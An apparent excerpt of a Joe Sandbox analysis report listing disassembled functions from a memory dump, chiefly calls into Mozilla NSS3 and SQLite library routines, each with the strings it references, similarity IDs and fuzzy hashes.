                                                                                                                                                                                                                            • Part of subcall function 6C539DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DC6
                                                                                                                                                                                                                            • Part of subcall function 6C539DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DD1
                                                                                                                                                                                                                            • Part of subcall function 6C539DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C539DED
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C494D98
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C494DDA
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C494E02
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4032354334-0
                                                                                                                                                                                                                          • Opcode ID: ad6743c83d7e718c9af763820db3913bbc4b63f19d478c064bce7fd92d582288
                                                                                                                                                                                                                          • Instruction ID: dbc52544bf2e53cf3879094097ce7b25eaf0618f0e20efed686690dcee077d6e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad6743c83d7e718c9af763820db3913bbc4b63f19d478c064bce7fd92d582288
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E41E7B9A006119BEB01EF28EC44D667BB8BF1525DF055274EC1987B21FB31E914C7E1
                                                                                                                                                                                                                          Function 6C47BFF0 Relevance: 15.1, APIs: 10, Instructions: 96memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C47BFFB
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000018C), ref: 6C47C015
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • memset.VCRUNTIME140(-00000004,00000000,00000188), ref: 6C47C032
                                                                                                                                                                                                                          • DER_SetUInteger.NSS3(00000000,00000078,00000000), ref: 6C47C04D
                                                                                                                                                                                                                            • Part of subcall function 6C4C69E0: PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C4C6A47
                                                                                                                                                                                                                            • Part of subcall function 6C4C69E0: memcpy.VCRUNTIME140(00000000,-00000005,00000001), ref: 6C4C6A64
                                                                                                                                                                                                                          • DER_SetUInteger.NSS3(00000000,00000084,?), ref: 6C47C064
                                                                                                                                                                                                                          • CERT_CopyName.NSS3(00000000,000000A8,?), ref: 6C47C07B
                                                                                                                                                                                                                            • Part of subcall function 6C478980: PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6C477310), ref: 6C4789B8
                                                                                                                                                                                                                            • Part of subcall function 6C478980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6C477310), ref: 6C4789E6
                                                                                                                                                                                                                            • Part of subcall function 6C478980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6C478A00
                                                                                                                                                                                                                            • Part of subcall function 6C478980: CERT_CopyRDN.NSS3(00000004,00000000,6C477310,?,?,00000004,?), ref: 6C478A1B
                                                                                                                                                                                                                            • Part of subcall function 6C478980: PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6C478A74
                                                                                                                                                                                                                            • Part of subcall function 6C471D10: PORT_FreeArena_Util.NSS3(000000B0,00000000,00000000,00000000,00000000,?,6C47C097,00000000,000000B0,?), ref: 6C471D2C
                                                                                                                                                                                                                            • Part of subcall function 6C471D10: SECITEM_CopyItem_Util.NSS3(000000B0,00000004,6C47C09B,00000000,00000000,00000000,?,6C47C097,00000000,000000B0,?), ref: 6C471D3F
                                                                                                                                                                                                                            • Part of subcall function 6C471D10: SECITEM_CopyItem_Util.NSS3(000000B0,-00000010,6C47C087,00000000,000000B0,?), ref: 6C471D54
                                                                                                                                                                                                                          • CERT_CopyName.NSS3(00000000,000000CC,?), ref: 6C47C0AD
                                                                                                                                                                                                                          • SECKEY_CopySubjectPublicKeyInfo.NSS3(00000000,-000000D4,?), ref: 6C47C0C9
                                                                                                                                                                                                                            • Part of subcall function 6C482DD0: SECOID_CopyAlgorithmID_Util.NSS3(-000000D4,-00000004,6C47C0D2,6C47C0CE,00000000,-000000D4,?), ref: 6C482DF5
                                                                                                                                                                                                                            • Part of subcall function 6C482DD0: SECITEM_CopyItem_Util.NSS3(-000000D4,-0000001C,?,?,?,?,6C47C0CE,00000000,-000000D4,?), ref: 6C482E27
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C47C0D6
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47C0E3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Copy$Arena$Alloc_Arena_$FreeItem_$IntegerNameValue$AlgorithmAllocateCertificateCriticalDestroyEnterGrow_InfoInitLockPoolPublicSectionSubjectUnlockcallocmemcpymemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3955726912-0
                                                                                                                                                                                                                          • Opcode ID: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
                                                                                                                                                                                                                          • Instruction ID: d96291ca8283d65bb23e2111cc07ec3aa8bd21dc9474125ec5a8b74af5304087
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5321A1B664010567FB20EAA1AC85FFB32BC9B4175DF084138FD04DA746FB22D91982F2
                                                                                                                                                                                                                          Function 6C472E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C472CDA,?,00000000), ref: 6C472E1E
                                                                                                                                                                                                                            • Part of subcall function 6C4CFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C479003,?), ref: 6C4CFD91
                                                                                                                                                                                                                            • Part of subcall function 6C4CFD80: PORT_Alloc_Util.NSS3(A4686C4D,?), ref: 6C4CFDA2
                                                                                                                                                                                                                            • Part of subcall function 6C4CFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C4D,?,?), ref: 6C4CFDC4
                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C472E33
                                                                                                                                                                                                                            • Part of subcall function 6C4CFD80: free.MOZGLUE(00000000,?,?), ref: 6C4CFDD1
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C472E4E
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C472E5E
                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?), ref: 6C472E71
                                                                                                                                                                                                                          • PL_HashTableRemove.NSS3(?), ref: 6C472E84
                                                                                                                                                                                                                          • PL_HashTableAdd.NSS3(?,00000000), ref: 6C472E96
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C472EA9
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C472EB6
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C472EC5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3332421221-0
                                                                                                                                                                                                                          • Opcode ID: e12f2dda7f69dfb3f71a7c5dff336230596f205b07167bc2d84f1381e9531dc1
                                                                                                                                                                                                                          • Instruction ID: 9169e12b6f706f492796311e7c3b0f29afafca67da032e6de53cfc78c40d0d8b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e12f2dda7f69dfb3f71a7c5dff336230596f205b07167bc2d84f1381e9531dc1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5521F576A44201E7EF219B25EC09EDA3A749B5235EF050034ED1886B11FB32EA59C7E5
                                                                                                                                                                                                                          Function 6C45FC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C45FD18
                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C45FD5F
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C45FD89
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C45FD99
                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C45FE3C
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C45FEE3
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C45FEEE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                                                                                                                                                                                          • String ID: simple
                                                                                                                                                                                                                          • API String ID: 1130978851-3246079234
                                                                                                                                                                                                                          • Opcode ID: cc07923dab7fe427989587cd58d10c2298bf7de69f1e5cc4db8db9d6c7124e8d
                                                                                                                                                                                                                          • Instruction ID: e4fd46e6f641e32371c2988382bac3a9784669e99c3b23c9818e64388577747a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc07923dab7fe427989587cd58d10c2298bf7de69f1e5cc4db8db9d6c7124e8d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 029181B0B022058FEB04CF55C880EAAB7B1FF85319F64C568D8199BB52E731E865CB91
                                                                                                                                                                                                                          Function 6C465CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C465EC9
                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C465EED
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • unable to close due to unfinalized statements or unfinished backups, xrefs: 6C465E64
                                                                                                                                                                                                                          • API call with %s database connection pointer, xrefs: 6C465EC3
                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C465ED1
                                                                                                                                                                                                                          • invalid, xrefs: 6C465EBE
                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C465EE0
                                                                                                                                                                                                                          • misuse, xrefs: 6C465EDB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                                                                          • API String ID: 632333372-1982981357
                                                                                                                                                                                                                          • Opcode ID: 15561e8ff6132193e4ff5b415cd5ab73f2d7ace30bc882beca8f7a0f5abccfa0
                                                                                                                                                                                                                          • Instruction ID: 8708bf872cec13717263f1a55730c1075aae9207930775d73f988f0fb4397601
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15561e8ff6132193e4ff5b415cd5ab73f2d7ace30bc882beca8f7a0f5abccfa0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C81BE30B056129BEB19CF66C848FAA7770BF4130DF288269D8155BF9AD730E842CBD1
                                                                                                                                                                                                                          Function 6C44DCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C44DDF9
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C44DE68
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C44DE97
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C44DEB6
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C44DF78
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 1526119172-598938438
                                                                                                                                                                                                                          • Opcode ID: 8139ddf86fa2befd63b4d2a6003a810322e4e5504453e437fd92d3e88a15f4a3
                                                                                                                                                                                                                          • Instruction ID: 10d36a4a40e43641da74d4cb83dc107e442ab20182d041461ac400cb8fe125c9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8139ddf86fa2befd63b4d2a6003a810322e4e5504453e437fd92d3e88a15f4a3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE8180716047009FE714DF65C880F6A77E1EF85309F24C86DE99A8BB91E731E846CB92
                                                                                                                                                                                                                          Function 6C3FCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C3FB999), ref: 6C3FCFF3
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C3FB999), ref: 6C3FD02B
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C3FB999), ref: 6C3FD041
                                                                                                                                                                                                                          • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C3FB999), ref: 6C54972B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 491875419-598938438
                                                                                                                                                                                                                          • Opcode ID: 0ebf5a01bc3ba08d3fb6f4b6b605b27399cc1d90b47122732718c49a526db24a
                                                                                                                                                                                                                          • Instruction ID: 7582f84199e9775e2d9788e13f958186fad4a7cc50a925fb321e5cc4ce629708
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ebf5a01bc3ba08d3fb6f4b6b605b27399cc1d90b47122732718c49a526db24a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1613771A042108BD310CF29CC41BAABBF5EF95318F1885ADE4489BB42D376E947CBE1
                                                                                                                                                                                                                          Function 6C4FFFF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C500113
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C500130
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000040), ref: 6C50015D
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000042,?,?), ref: 6C5001AF
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFD056,00000000), ref: 6C500202
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C500224
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C500253
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error$Alloc_FreeIdentitiesK11_LayerUtilfreememcpy
                                                                                                                                                                                                                          • String ID: exporter
                                                                                                                                                                                                                          • API String ID: 712147604-111224270
                                                                                                                                                                                                                          • Opcode ID: ac330be87068f54b756c5642ba26b0709179db7e2a92b2361b0dc4216e41cedf
                                                                                                                                                                                                                          • Instruction ID: 2b1b9842bc1bc29f616eb6b20addfcdedeec07d5ec8cfaf4a58f863616482d5e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac330be87068f54b756c5642ba26b0709179db7e2a92b2361b0dc4216e41cedf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD61F571E007899BEF118FA4CC04BEE77B6BFC4308F144529ED1A96A62EB31A954C791
                                                                                                                                                                                                                          Function 6C4D4DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C4D536F,00000022,?,?,00000000,?), ref: 6C4D4E70
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C4D4F28
                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C4D4F8E
                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C4D4FAE
